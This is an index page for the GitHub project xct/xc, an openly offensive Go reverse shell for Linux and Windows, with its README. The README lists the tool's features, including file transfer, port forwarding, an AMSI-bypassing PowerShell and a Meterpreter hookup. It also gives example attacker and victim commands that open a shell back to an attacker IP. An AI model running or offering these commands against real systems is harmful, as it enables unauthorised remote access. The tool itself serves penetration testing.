Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/xct/xc

A small reverse shell for Linux & Windows
https://github.com/xct/xc

Last synced: 30 days ago
JSON representation

A small reverse shell for Linux & Windows

Host: GitHub
URL: https://github.com/xct/xc
Owner: xct
Created: 2020-05-09T08:11:50.000Z (over 4 years ago)
Default Branch: master
Last Pushed: 2024-06-05T17:58:34.000Z (6 months ago)
Last Synced: 2024-08-03T22:19:28.982Z (4 months ago)
Language: Go
Homepage:
Size: 803 KB
Stars: 576
Watchers: 8
Forks: 104
Open Issues: 6
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

jimsghstars - xct/xc - A small reverse shell for Linux & Windows (Go)
awesome-hacking-lists - xct/xc - A small reverse shell for Linux & Windows (Go)

README

# XC

Netcat like reverse shell for Linux & Windows.

## Features

### Windows

```
Usage:
└ Shared Commands: !exit
!upload
* uploads a file to the target
!download
* downloads a file from the target
!lfwd
* local portforwarding (like ssh -L)
!rfwd
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd
* removes forward by index
!plugins
* lists available plugins
!plugin
* execute a plugin
!spawn
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas
* restart xc with the specified user
!met
* connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
!powershell
* starts powershell with AMSI Bypass
!rc
* connects to a local bind shell and restarts this client over it
!runasps
* restart xc with the specified user using powershell
!vulns
* checks for common vulnerabilities
```

### Linux

```
Usage:
└ Shared Commands: !exit
!upload
* uploads a file to the target
!download
* downloads a file from the target
!lfwd
* local portforwarding (like ssh -L)
!rfwd
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd
* removes forward by index
!plugins
* lists available plugins
!plugin
* execute a plugin
!spawn
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas
* restart xc with the specified user
!met
* connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
!ssh
* starts sshd with the configured keys on the specified port
```

## Examples

- Linux Attacker: `rlwrap xc -l -p 1337` (Server)
- WindowsVictim : `xc.exe 10.10.14.4 1337` (Client)
- Argumentless: `xc_10.10.14.4_1337.exe` (Client)

## Setup

Make sure you are running golang version 1.15+, older versions will not compile. I tested it on ubuntu: `go version go1.16.2 linux/amd64` and kali `go version go1.15.9 linux/amd64`

```
git clone --recurse-submodules https://github.com/xct/xc.git

GO111MODULE=off go get golang.org/x/sys/...
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
GO111MODULE=off go get github.com/libp2p/go-reuseport
sudo apt-get install rlwrap upx
```

Linux:
```
python3 build.py
```

## Credits

* Included for Windows Clients: https://github.com/itm4n/PrivescCheck
* Included for Windows Clients: https://github.com/PowerShell/Win32-OpenSSH